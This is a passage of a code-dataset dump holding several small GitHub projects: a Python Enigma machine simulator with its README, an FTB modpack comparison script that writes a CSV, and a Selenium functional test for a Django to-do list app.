rotorI\n\t\t\tleft_notch = notchI\n\t\telif(sys.argv[1]=='II'):\n\t\t\tleft_rotor = rotorII\n\t\t\tleft_notch = notchII\n\t\telif(sys.argv[1]=='III'):\n\t\t\tleft_rotor = rotorIII\n\t\t\tleft_notch = notchIII\n\t\telif(sys.argv[1]=='IV'):\n\t\t\tleft_rotor = rotorIV\n\t\t\tleft_notch = notchIV\n\t\telif(sys.argv[1]=='V'):\n\t\t\tleft_rotor = rotorV\n\t\t\tleft_notch = notchV\n\t\telse:\n\t\t\tsys.exit(\"Invalid rotor, exiting\")\n\t\tleft_starting_pos = sys.argv[8]\n\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,int(sys.argv[5]),left_starting_pos)\n\n\t\t#middle rotor\n\t\tif(sys.argv[2]=='I'):\n\t\t\tmid_rotor = rotorI\n\t\t\tmid_notch = notchI\n\t\telif(sys.argv[2]=='II'):\n\t\t\tmid_rotor = rotorII\n\t\t\tmid_notch = notchII\n\t\telif(sys.argv[2]=='III'):\n\t\t\tmid_rotor = rotorIII\n\t\t\tmid_notch = notchIII\n\t\telif(sys.argv[2]=='IV'):\n\t\t\tmid_rotor = rotorIV\n\t\t\tmid_notch = notchIV\n\t\telif(sys.argv[2]=='V'):\n\t\t\tmid_rotor = rotorV\n\t\t\tmid_notch = notchV\n\t\telse:\n\t\t\tsys.exit(\"Invalid rotor, exiting\")\n\t\tmid_starting_pos = sys.argv[9]\n\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,int(sys.argv[6]),mid_starting_pos)\n\n\t\t#right rotor\n\t\tif(sys.argv[3]=='I'):\n\t\t\tright_rotor = rotorI\n\t\t\tright_notch = notchI\n\t\telif(sys.argv[3]=='II'):\n\t\t\tright_rotor = rotorII\n\t\t\tright_notch = notchII\n\t\telif(sys.argv[3]=='III'):\n\t\t\tright_rotor = rotorIII\n\t\t\tright_notch = notchIII\n\t\telif(sys.argv[3]=='IV'):\n\t\t\tright_rotor = rotorIV\n\t\t\tright_notch = notchIV\n\t\telif(sys.argv[3]=='V'):\n\t\t\tright_rotor = rotorV\n\t\t\tright_notch = notchV\n\t\telse:\n\t\t\tsys.exit(\"Invalid rotor, exiting\")\n\t\tright_starting_pos = sys.argv[10]\n\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,int(sys.argv[7]),right_starting_pos)\n\n\t\t#reflector\n\t\tif(sys.argv[4]=='A'):\n\t\t\treflector = reflectorA\n\t\telif(sys.argv[4]=='B'):\n\t\t\treflector = reflectorB\n\t\telif(sys.argv[4]=='C'):\n\t\t\treflector = reflectorC\n\t\telse:\n\t\t\tsys.exit(\"Invalid reflector, exiting\")\n\t\t#populate reflect contact mapping dictionary\n\t\tfor i in range(1,27):\n\t\t\tletter = r_alphabet[i]\n\t\t\tcontact_out = alphabet_mapping[reflector[letter]]-1\n\t\t\tif(contact_out==0): #A is now contact pin 26 and not 1\n\t\t\t\tcontact_out = 26\n\t\t\treflector_mapping[i] = contact_out\n\n\t\t#plugboard pairs\n\t\tif(sys.argv[11]=='29'):\n\t\t\tplugboard = plugboard29\n\t\telif(sys.argv[11]=='30'):\n\t\t\tplugboard = plugboard30\n\t\telif(sys.argv[11]=='31'):\n\t\t\tplugboard = plugboard31\n\t\telse:\n\t\t\tsys.exit(\"Invalid plugboard, exiting\")\n\n\t#preset\n\telse:\n\n\t\t#reflector\n\t\tif(sys.argv[2]=='A'):\n\t\t\treflector = reflectorA\n\t\telif(sys.argv[2]=='B'):\n\t\t\treflector = reflectorB\n\t\telif(sys.argv[2]=='C'):\n\t\t\treflector = reflectorC\n\t\telse:\n\t\t\tsys.exit(\"Invalid reflector, exiting\")\n\t\t#populate reflect contact mapping dictionary\n\t\tfor i in range(1,27):\n\t\t\tletter = r_alphabet[i]\n\t\t\tcontact_out = alphabet_mapping[reflector[letter]]-1\n\t\t\tif(contact_out==0): #A is now contact pin 26 and not 1\n\t\t\t\tcontact_out = 26\n\t\t\treflector_mapping[i] = contact_out\n\n\t\tleft_starting_pos = sys.argv[2]\n\t\tmid_starting_pos = sys.argv[3]\n\t\tright_starting_pos = sys.argv[4]\n\n\t\tif(sys.argv[1]=='29'):\n\t\t\tleft_rotor = rotorIII\n\t\t\tleft_notch = notchIII\n\t\t\tmid_rotor = rotorII\n\t\t\tmid_notch = notchII\n\t\t\tright_rotor = rotorI\n\t\t\tright_notch = notchI\n\t\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,12,left_starting_pos)\n\t\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,24,mid_starting_pos)\n\t\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,3,right_starting_pos)\n\t\t\tplugboard = plugboard29\n\t\telif(sys.argv[1]=='30'):\n\t\t\tleft_rotor = rotorIV\n\t\t\tleft_notch = notchIV\n\t\t\tmid_rotor = rotorIII\n\t\t\tmid_notch = notchIII\n\t\t\tright_rotor = rotorII\n\t\t\tright_notch = notchII\n\t\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,5,left_starting_pos)\n\t\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,26,mid_starting_pos)\n\t\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,2,right_starting_pos)\n\t\t\tplugboard = plugboard30\n\t\telif(sys.argv[1]=='31'):\n\t\t\tleft_rotor = rotorI\n\t\t\tleft_notch = notchI\n\t\t\tmid_rotor = rotorV\n\t\t\tmid_notch = notchV\n\t\t\tright_rotor = rotorIII\n\t\t\tright_notch = notchIII\n\t\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,14,left_starting_pos)\n\t\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,9,mid_starting_pos)\n\t\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,24,right_starting_pos)\n\t\t\tplugboard = plugboard31\n\t\telse:\n\t\t\tsys.exit(\"Invalid preset, exiting\")\n\n\tmsg = raw_input(\"Type in your message (Note, punctuation and spaces will not be encrypted): \")\n\tprint(\"\\n\\n\")\n\tprint(enigma(msg,\n\t\t\t\t curr_left_rotor,\n\t\t\t\t left_notch,\n\t\t\t\t left_starting_pos,\n\t\t\t\t curr_mid_rotor,\n\t\t\t\t mid_notch,\n\t\t\t\t mid_starting_pos,\n\t\t\t\t curr_right_rotor,\n\t\t\t\t right_notch,\n\t\t\t\t right_starting_pos,\n\t\t\t\t reflector_mapping,\n\t\t\t\t plugboard))\n\n\tsys.exit()" }, { "alpha_fraction": 0.7600423097610474, "alphanum_fraction": 0.7790697813034058, "avg_line_length": 35.42307662963867, "blob_id": "bb4bb2cf4d217d6384b87c4194a54af0da1f77c9", "content_id": "bd0586a5241b3f076072958e9d7d82ff2d1eee97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 946, "license_type": "no_license", "max_line_length": 109, "num_lines": 26, "path": "/README.md", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "# enigma_python\n\nRotor and reflector wirings to be chosen from rotor wiring tables here:\nhttps://en.wikipedia.org/wiki/Enigma_rotor_details\n\n3-rotor configurations and plugboard configurations from here:\nhttps://en.wikipedia.org/wiki/Enigma_machine#/media/File:Enigma_keylist_3_rotor.jpg\n\nRing setting (ringstellung) and rotor starting position explained here: (easy to confuse them)\nhttp://users.telenet.be/d.rijmenants/en/enigmatech.htm\n\nUsage:\n`python input.py I II III A 1 2 3 A B C 29`\n\n`python input.py 29 A A B C`\n\n\n### File Breakdown\n\nenigma.py - the actual polyalphabetic substitution algorithm used by enigma. Algorithm is called by input.py\n\ninput.py - command line input argument processing and calling of the algorithm\n\nplugboard.py - Contains the plugboard pairings for the 29th, 30th, and 31st from keylist #649 from link above\n\nrotors.py - Contains the rotor wiring dictionaries for rotors I, II, III, IV, V and reflectors A, B, C" }, { "alpha_fraction": 0.6310621500015259, "alphanum_fraction": 0.6456913948059082, "avg_line_length": 35.42335891723633, "blob_id": "bc4f9189e70d4e3f61627b2a347afe8c4c1c840b", "content_id": "940f6084e8d2804073020d356e44e849eeb87390", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4990, "license_type": "no_license", "max_line_length": 141, "num_lines": 137, "path": "/src/enigma.py", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "#actual encryption algorithm stuff here\n\"\"\"\nat the very rudimentary level, the algorithm goes like this:\n\ninput -> plugboard -> right rotor -> mid rotor -> left rotor -> reflector -> left rotor -> mid rotor -> right rotor -> plugboard -> output\n\"\"\"\n\n#stepping a rotor, input is the wiring dict for a particular rotor\ndef step_rotor(rotor):\n\tnew_dict = {}\n\t#rotor is turning towards the operator, so decrement the pin number\n\tfor contact_in in rotor:\n\t\tnew_in = contact_in-1\n\t\tnew_out = rotor[contact_in]-1\n\t\tif(new_in < 1):\n\t\t\tnew_in = 26\n\t\tif(new_out < 1):\n\t\t\tnew_out = 26\n\t\tnew_dict[new_in] = new_out\n\treturn new_dict\n\n#pass in the wiring dictionaries populated in input.py\ndef enigma(msg,lr,lnotch,lstart,mr,mnotch,mstart,rr,rnotch,rstart,reflector,plugboard):\n\toutput_str = ''\n\tupp_msg = msg.upper()\n\tleft_rotor = lr\n\tmid_rotor = mr\n\tright_rotor = rr\n\tfor char in upp_msg:\n\t\t#don't encrypt any non alphabetic characters\n\t\tif(not char.isalpha()):\n\t\t\toutput_str = output_str + char\n\n\t\telse:\n\t\t\talphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\t\t\t#maps alphabet to the entry wheel pins basically\n\t\t\tentry_mapping = { 'A':1,'B':2,'C':3,'D':4,'E':5,'F':6,'G':7,'H':8,'I':9,'J':10,'K':11,'L':12,'M':13,'N':14,'O':15,\n\t\t\t\t\t\t\t\t 'P':16,'Q':17,'R':18,'S':19,'T':20,'U':21,'V':22,'W':23,'X':24,'Y':25,'Z':26 }\n\t\t\toutput_char = char\n\t\t\tcurr_char_left = alphabet.index(lstart)\n\t\t\tcurr_char_mid = alphabet.index(mstart)\n\t\t\tcurr_char_right = alphabet.index(rstart) \n\t\t\tstep_mid = False\n\t\t\tstep_left = False\n\n\t\t\t##### 1. PLUGBOARD ######\n\t\t\t# print(\"step 1\")\n\t\t\t#if character needs to be swapped per plugboard\n\t\t\tif(output_char in plugboard): #char in keys\n\t\t\t\toutput_char = plugboard[output_char]\n\t\t\telif(output_char in plugboard.values()): #char in values\n\t\t\t\tfor key_char in plugboard:\n\t\t\t\t\tif(plugboard[key_char] == output_char):\n\t\t\t\t\t\toutput_char = key_char\n\t\t\t\t\t\tbreak\n\n\t\t\t##### 2. Stepping the rotors #####\n\t\t\t# print(\"step 2\")\n\t\t\tif(alphabet[curr_char_mid] == mnotch):\n\t\t\t\tstep_left = True\n\t\t\tif(alphabet[curr_char_right] == rnotch):\n\t\t\t\tstep_mid = True\n\n\t\t\tif(step_left):\n\t\t\t\tleft_rotor = step_rotor(left_rotor)\n\t\t\t\tcurr_char_left = (curr_char_left+1) % len(alphabet) #update rotor position (character that would show on top on an actual enigma machine)\n\t\t\t\tmid_rotor = step_rotor(mid_rotor) #mid rotor also steps because of the double stepping phenomena\n\t\t\t\tcurr_char_mid = (curr_char_mid+1) % len(alphabet) #update rotor position\n\t\t\t\tstep_left = False\n\t\t\t\tstep_mid = False #I haven't encountered this in all of the material that I've read so far about the enigma, but\n\t\t\t\t\t\t\t\t #basically the case where both the mid and right rotors are in their notch positions. If my logic\n\t\t\t\t\t\t\t\t #is correct, this can only happen if the starting positions of the rotors are set to the notch\n\t\t\t\t\t\t\t\t #positions intentionally.\n\t\t\tif(step_mid):\n\t\t\t\tmid_rotor = step_rotor(mid_rotor)\n\t\t\t\tcurr_char_mid = (curr_char_mid+1) % len(alphabet) #update rotor position\n\t\t\t\tstep_mid = False\n\t\t\tright_rotor = step_rotor(right_rotor) #right rotor steps with every keystroke\n\t\t\tcurr_char_right = (curr_char_right+1) % len(alphabet) #update rotor position\n \n\t\t\t##### 3. Rotors #####\n\t\t\t# print(\"step 3\")\n\t\t\tentry_out = entry_mapping[output_char]\n\t\t\tright_out = right_rotor[entry_out] #right rotor substitution\n\t\t\tmid_out = mid_rotor[right_out] #mid rotor substitution\n\t\t\tleft_out = left_rotor[mid_out] #left rotor substitution\n\n\t\t\t##### 4. Reflector #####\n\t\t\t# print(\"step 4\")\n\t\t\tref_out = reflector[left_out]\n\n\t\t\t##### 5. Rotors (again) #####\n\t\t\t# print(\"step 5\")\n\t\t\t#going backwards through the rotors, and since the rotor wiring dictionaries are one-directional,\n\t\t\t#have to go through the connections and find the input contact that connects to the output contact\n\t\t\t#that we got from the reflector\n\t\t\tmid_in = 0\n\t\t\twhile(mid_in == 0): #finding pin to mid rotor\n\t\t\t\tfor pin_in in left_rotor:\n\t\t\t\t\tif(left_rotor[pin_in] == ref_out):\n\t\t\t\t\t\tmid_in = pin_in\n\t\t\t\t\t\tbreak\n\n\t\t\tright_in = 0\n\t\t\twhile(right_in == 0): #finding pin to right rotor\n\t\t\t\tfor pin_in in mid_rotor:\n\t\t\t\t\tif(mid_rotor[pin_in] == mid_in):\n\t\t\t\t\t\tright_in = pin_in\n\t\t\t\t\t\tbreak\n\n\t\t\tentry_in = 0\n\t\t\t# print(right_rotor)\n\t\t\twhile(entry_in == 0): #finding pin to entry\n\t\t\t\tfor pin_in in right_rotor:\n\t\t\t\t\tif(right_rotor[pin_in] == right_in):\n\t\t\t\t\t\tentry_in = pin_in\n\t\t\t\t\t\tbreak\n\n\t\t\t#find what character has been output by all the rotor stuff\n\t\t\tfor letter in entry_mapping:\n\t\t\t\tif(entry_mapping[letter] == entry_in):\n\t\t\t\t\toutput_char = letter\n\t\t\t\t\tbreak\n\n\t\t\t##### 6. Plugboard (again) #####\n\t\t\t# print(\"step 6\")\n\t\t\t#if character needs to be swapped per plugboard\n\t\t\tif(output_char in plugboard): #char in keys\n\t\t\t\toutput_char = plugboard[output_char]\n\t\t\telif(output_char in plugboard.values()): #char in values\n\t\t\t\tfor key_char in plugboard:\n\t\t\t\t\tif(plugboard[key_char] == output_char):\n\t\t\t\t\t\toutput_char = key_char\n\t\t\t\t\t\tbreak\n\n\t\t\toutput_str = output_str + output_char\n\treturn output_str\n" }, { "alpha_fraction": 0.4477987289428711, "alphanum_fraction": 0.47044023871421814, "avg_line_length": 17.952381134033203, "blob_id": "a3a13de701af39bc2d76cc31d9774b8dfe21764f", "content_id": "6a3415a36e4a8000f8a82540fe83cde7559aa375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 795, "license_type": "no_license", "max_line_length": 84, "num_lines": 42, "path": "/src/plugboard.py", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "\"\"\" Plugboard pairings\n\n\tUp to 10 alphabetic pairings could be made via physical wire connections.\n\tThis was the final component of the encryption before the accompanying lamp\n\twould be lit for a keypress.\n\n\tTaken from the 31st, 30th, and 29th from keylist #649, link below:\n\thttps://en.wikipedia.org/wiki/Enigma_machine#/media/File:Enigma_keylist_3_rotor.jpg\n\"\"\"\n\nplugboard31 = { 'S':'Z',\n\t\t\t\t'G':'T',\n\t\t\t\t'D':'V',\n\t\t\t\t'K':'U',\n\t\t\t\t'F':'O',\n\t\t\t\t'M':'Y',\n\t\t\t\t'E':'W',\n\t\t\t\t'J':'N',\n\t\t\t\t'I':'X',\n\t\t\t\t'L':'Q' }\n\nplugboard30 = { 'I':'S',\n\t\t\t\t'E':'V',\n\t\t\t\t'M':'X',\n\t\t\t\t'R':'W',\n\t\t\t\t'D':'T',\n\t\t\t\t'U':'Z',\n\t\t\t\t'J':'Q',\n\t\t\t\t'A':'O',\n\t\t\t\t'C':'H',\n\t\t\t\t'N':'Y' }\n\nplugboard29 = { 'D':'J',\n\t\t\t\t'A':'T',\n\t\t\t\t'C':'V',\n\t\t\t\t'I':'O',\n\t\t\t\t'E':'R',\n\t\t\t\t'Q':'S',\n\t\t\t\t'L':'W',\n\t\t\t\t'P':'Z',\n\t\t\t\t'F':'N',\n\t\t\t\t'B':'H' }" } ]
4
JeppeKlitgaard/FTB-Pack-Comparer
https://github.com/JeppeKlitgaard/FTB-Pack-Comparer
583e3bf8ffffaf8c4cb74a7153d577e00125ea06
58c74a8e970566ea765c30b9aebb64c4220de56b
a856f33c0382c9f8553c66a872f90dd65dc86f0c
refs/heads/master
2021-05-27T20:59:52.598250
2012-12-30T20:00:00
2012-12-30T20:00:00
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.580181896686554, "alphanum_fraction": 0.584490180015564, "avg_line_length": 24.468355178833008, "blob_id": "f03fdb57afb1ab6d7cd2e23fd7632dc5e8a56948", "content_id": "a16fc27d01babbe6ee5966dc8d75920748dc4c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2089, "license_type": "no_license", "max_line_length": 78, "num_lines": 79, "path": "/compare.py", "repo_name": "JeppeKlitgaard/FTB-Pack-Comparer", "src_encoding": "UTF-8", "text": "import urllib2 # Import urllib2 for downloading the xml.etree\r\nimport xml.etree.ElementTree as et # Import ElementTree for parsing xml.etree\r\nimport csv # For outputting.\r\nimport re\r\n\r\nxml_url = \"http://www.creeperrepo.net/static/FTB2/modpacks.xml\"\r\nraw_xml = urllib2.urlopen(xml_url) # We don't use .read() because et.parse\r\n# Takes a file object.\r\n\r\nroot = et.parse(raw_xml).getroot()\r\n\r\n\r\ndef normalize(string):\r\n \"\"\"Normalizes a string.\"\"\"\r\n string = string.lower() # Lower case\r\n\r\n string = string.replace(\"'\", \"\")\r\n\r\n regex = re.compile(r\" by (.)*\")\r\n string = re.sub(regex, \"\", string)\r\n\r\n regex = re.compile(r\"(\\d)+\")\r\n string = re.sub(regex, \"\", string)\r\n\r\n string = string.replace(\" \", \"\")\r\n\r\n string = string.title()\r\n\r\n return string\r\n\r\nmods = [] # Compile a list of all the mods used.\r\npacks = [] # Compile a list of all the packs.\r\nfor pack in root: # For every pack in the mod packs\r\n packs.append(pack.attrib[\"name\"])\r\n for mod in pack.attrib[\"mods\"].split(\"; \"): # For every mod in pack\r\n mod = normalize(mod)\r\n\r\n if mod not in mods:\r\n mods.append(mod.replace(\" \", \"\").title()) # Add to known mods.\r\n\r\nmods = sorted(mods) # Sort mods alphabeticly - I spelled alphabeticly wrong\r\n# didn't I. Oh well.\r\n\r\n# Write it.\r\nrows = []\r\nrows.append(mods)\r\n\r\nfor pack in root:\r\n row = []\r\n row.append(pack.attrib[\"name\"] + \"(%s)\" % pack.attrib[\"mcVersion\"])\r\n\r\n for _ in range(1, len(mods)):\r\n row.append(\"NO\")\r\n\r\n for mod in pack.attrib[\"mods\"].split(\"; \"):\r\n mod = normalize(mod)\r\n\r\n i = 0\r\n for compare_mod in rows[0]:\r\n if mod == compare_mod and i > 0:\r\n row[i] = \"YES\"\r\n i += 1\r\n rows.append(row)\r\n\r\n\r\n### Credits.\r\nrows.append([])\r\nrows.append([\"Made by: Dkkline\"])\r\nrows.append([\"Source is on my github.\"])\r\n\r\n\r\nwith open(\"ftb_compare.csv\", \"wb\") as csvfile:\r\n writer = csv.writer(csvfile, delimiter=\"_\")\r\n for row in rows:\r\n writer.writerow(row)\r\n\r\n\r\nprint \"Made by Dkkline.\"\r\nprint \"Saved to: ftb_compare.csv\"" }, { "alpha_fraction": 0.7192575335502625, "alphanum_fraction": 0.7285382747650146, "avg_line_length": 40.0476188659668, "blob_id": "74092eb361b324028dc48e89e592c90d6a765cd2", "content_id": "0380b3f43212725494fc1627c62cb2889f290950", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 862, "license_type": "no_license", "max_line_length": 114, "num_lines": 21, "path": "/README.md", "repo_name": "JeppeKlitgaard/FTB-Pack-Comparer", "src_encoding": "UTF-8", "text": "FTB-Pack-Comparer\n=================\n\nGenerates an CSV file for importing to Google Docs containing a comparison of the different FTB packs.\n\n\n\"Official\" google docs page: https://docs.google.com/spreadsheet/pub?key=0AoBvEi8Kl59JdDN4SFdIS3ZJNDAtekZPWEYxU083RGc&single=true&gid=0&output=html\nOnly DW20 and MindCrack: https://docs.google.com/spreadsheet/pub?key=0AoBvEi8Kl59JdGVBYUUwX1dGLWZDdW9PRDB0cFdZc3c&single=true&gid=0&output=html\n\n\nSetup\n=====\n* Generate a csv file by executing `python compare.py`\n* Go to docs.google.com, create a new spreadsheet. With seperator: \"_\"\n* Select all the fields (press the little square between \"1\" and \"a\" field.)\n* Set font size to 18.\n* Right click -> Conditional formatting\n* Make 2 rules, they have to be exactly \"YES\" and \"NO\", \"YES\" should have green color, \"NO\" should have red color.\n* Profit.\n\nThis tutorial is extremely sloppy, but I don't expect anyone to use this except me, so that's fine!\n" } ]
2
ilonabudapesti/buddhism-nlp
https://github.com/ilonabudapesti/buddhism-nlp
7b5d898e07ba53c7eefec8f1f2b4ae358085d8aa
e5c004a66801addebd0727bf7613a4e3fb137c15
0a492eec03b3eba43a30ace3bcdb7e49f29ef7ad
refs/heads/master
2021-08-22T23:11:46.864767
2017-12-01T15:39:54
2017-12-01T15:39:54
107,881,243
13
2
null
null
null
null
null
[ { "alpha_fraction": 0.8272727131843567, "alphanum_fraction": 0.8272727131843567, "avg_line_length": 54, "blob_id": "41d18b59e6c073b033fb6e81ebe67c9ab3954faa", "content_id": "2ed583350d1e960e9c1ab481b4d41612e0ab129f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "no_license", "max_line_length": 94, "num_lines": 2, "path": "/README.md", "repo_name": "ilonabudapesti/buddhism-nlp", "src_encoding": "UTF-8", "text": "# buddhism-nlp\nNatural language processing on Buddhist texts in Pāli and Sanskrit, mostly corpus linguistics.\n" }, { "alpha_fraction": 0.5187265872955322, "alphanum_fraction": 0.5224719047546387, "avg_line_length": 13.833333015441895, "blob_id": "869ac708436c8675639d0ea88576d9a86b5fd650", "content_id": "026200d5db6e265131b62503411ef147f41ec677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 557, "license_type": "no_license", "max_line_length": 71, "num_lines": 36, "path": "/Thesis_Oxford_MSt/DPR_Myanmar_xml_and_processing/processed/corpus.py", "repo_name": "ilonabudapesti/buddhism-nlp", "src_encoding": "UTF-8", "text": "from nltk.corpus import PlaintextCorpusReader\ncorpus_root = '/Dropbox/repos/digitalpalireader/DPRMyanmar/content/xml'\n\n\n\nfileid[0]\n\ngenres = {\n 'v': 'Vinaya',\n 'd': 'Dīgha'\n 'm': 'Majjhima',\n 's': 'Saṃyutta'\n 'a': 'Aṅguttara',\n 'k': 'Khuddaka',\n '?': 'Abhidhamma',\n 'x': 'Vism',\n '?': 'Abhidh-s',\n '?': 'Byākaraṇa',\n 'b': ?,\n 'g': ?,\n\n}\n\nfileid[-1]\n\nlevel = {\n 'm': 'Mūla',\n 'a': 'Aṭṭhakathā'\n 't': 'ṭīka'\n}\n\nbaskets = {\n 'vinayapiṭaka': ['v'],\n 'suttapiṭaka': ['d', 's', 'a', 'm'],\n 'abhidammapiṭaka': ['?', '?']\n}\n" } ]
2
103percent/starreigns
https://github.com/103percent/starreigns
5dd3bf7c156dc886a4e1d724302ebc202b154377
8921a610c1664e5de4412c9899e2250fa8f239fd
68ff614ce894475ff6846bd156af249e32228f2d
refs/heads/master
2020-03-22T10:26:01.530704
2017-04-05T19:38:55
2017-04-05T19:38:55
74,374,794
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6786773800849915, "alphanum_fraction": 0.6888512372970581, "avg_line_length": 41.87272644042969, "blob_id": "6317cdfc9004a1ca1775bfd68ecefe2c8f171067", "content_id": "07c5aba14bcd42ec9afdf4a8d77bc4557c868225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2359, "license_type": "no_license", "max_line_length": 169, "num_lines": 55, "path": "/deckSystemDesign/abstractFramework.py", "repo_name": "103percent/starreigns", "src_encoding": "UTF-8", "text": "## Variables ##\n \nall_cards #(array of objects): Collection of JSON documents (for example, describing each card).\neligible_cards #(array of objects): A subset of the allCards collection. Cards that could be shown to player and their weightings.\nencounters #(int): The number of encounters the player will see before having to wait. \nplayer_state # (array of objects): Describes the current state of the core values, the narrative(s) underway, and a history of relevant choices made by the player. \n\n## Example of Card ##\n\n{ \n \"unique_id\" : \"ENGINEER-UNDERATTACK-002\" , \n \"encounter_string\" : \"The hull is severely compromised by enemy fire, should we direct additional power to the shields?\", \n \"card_image\" : \"picture_of_engineer.jpeg\",\n\t\"set\": \"basic_engineer\" # cards can only belong to one set.\n\t\"tags\": {[\"engineer\", \"under_attack\"]} \n\t\"prerequisites\":{ #Things which MUST be true in order for the card to be considered eligible.\n\t\t\"player_state.core.hull\": {\"$lte\": 25},\n\t\t\"player_state.setsOwned\": {\"$includes\": \"basic_engineer\"}\n\t},\n\t\"weights\":{ #Things which influence the probability of this card showing up or not if it is eligible.\n\t\t\"base_weight\": 100,\n\t\t\"player_state.history\": {\n\t\t\"range\": {[0,9]} # Last 10 cards swiped\n\t\t\"tags\": {\"$includes\": \"engineer\" } # for each one that has the engineer tag\n\t\t\"adjust_weight\" : -60 # lower weight by 60 to a minimum of zero\n\t\t},\n\t},\n\t\t\n\t},\n \"leftdata\" : { # What the 'left' choice is and what happens if you choose it.\n \"choice_string\" : \"Yes\",\n\t\t\"consequences\": {\n\t\t\t\"player_state.core.power\": -20\n\t\t},\n\t\t\"trigger_event\": \"ALIENS-RETREATING-SPECIAL\" # Reference to a card to show next. Does not decrease the encounters total. May be the only way to see this card at all. \t\n\t},\n\t \"rightdata\" : { # What the 'right' choice is and what happens if you choose it.\n \"choice_string\" : \"No\",\n\t\t\"consequences\": {\n\t\t\t\"player_state.core.hull\": -30,\n\t\t\t\"player_state.core.crew\": -15\n\t\t}\t\n\t},\t \n}\n\n## Session Behaviour ##\n\nwhile(encounters > 0){\nfrom eligible_cards #sample a card based on their weights, making any adjustments that the cards demand;\nResolve the effects of the player's decision;\nencounters -= 1;\nupdate eligible_cards;\n}\nStart timer to give the player more encounters;\nTell the player to go play with their balls until the encounters regenerate;\n\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 21, "blob_id": "cba2a183a047cf13aed87d77fa39b0a9fbef366f", "content_id": "b2b8fda61e132b6d8824965e59424508f4383469", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/README.md", "repo_name": "103percent/starreigns", "src_encoding": "UTF-8", "text": "# starreigns\nPrototype for our game concept\n" } ]
2
vendice/tdd-book
https://github.com/vendice/tdd-book
62ac458728b32801cd63bbccf289c4d37f35244f
666cd3d3b86c9e5db3b65936a0c503afd1d8a831
46f443a5e3a470fd627a98bdb99a4d2a9b6c53ab
refs/heads/master
2020-03-21T22:36:48.406381
2018-07-08T09:27:57
2018-07-08T09:27:57
139,136,891
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6364068388938904, "alphanum_fraction": 0.6402091383934021, "avg_line_length": 34.64406967163086, "blob_id": "a540bc583c10f9141a7e4f90142e03380554ceb3", "content_id": "95f1eefbcd4c513bbcf008271557335f832f387e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2104, "license_type": "no_license", "max_line_length": 170, "num_lines": 59, "path": "/functional_tests.py", "repo_name": "vendice/tdd-book", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport unittest\n\nclass NewVisitorTest (unittest.TestCase):\n\n def setUp(self):\n self.browser = webdriver.Firefox()\n\n def tearDown(self):\n self.browser.quit()\n \n def check_for_row_in_list_table(self, row_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n def test_can_start_a_list_and_retrieve_it_later(self):\n\n\n # der user hat von einer neuen to-do app geh;rt und besucht sie\n self.browser.get('http://localhost:8000')\n\n # er schaut sich den Titel der Seite an, und sieht To-Do \n self.assertIn('To-Do', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # Er kann ein to-do item eingeben\n inputbox = self.browser.find_element_by_id('id_new_item')\n self.assertEqual(inputbox.get_attribute('placeholder'), 'Enter a to-do item')\n\n # Er tippt einkaufen ein\n inputbox.send_keys('einkaufen')\n\n # Als er enter ein gibt wird die seite geupdated und er kann den ersten Punkt einkaufen sehen, die inputbox steht immernoch da und er kann weitere Punkte eingeben\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.check_for_row_in_list_table('1: einkaufen')\n self.check_for_row_in_list_table('2: essen')\n\n \n # Die Textbox steht noch immer da, er kann einen zweiten Punkt eingeben\n\n self.fail('Finish the test!')\n # nach dem druecken von enter stehen beide Punkte unterhalb der Textbox\n\n # Die Liste ist ueber eine einyigartige url aufrufbar\n\n # nach dem aufrufen der url ist der Text noch da\n\n\nif __name__ == '__main__':\n \n unittest.main(warnings='ignore')\n\n" } ]
1
larskfjntnu/TTK4145--vinger
https://github.com/larskfjntnu/TTK4145--vinger
b4e50318459ed93177249c28ab11ae51d8c8c032
2a7b839f39f6c8f73800de8c03146fd34e5bf722
e32439189d3bca9531b4f7a0706f29ea0ab65077
refs/heads/master
2020-12-03T04:17:11.811391
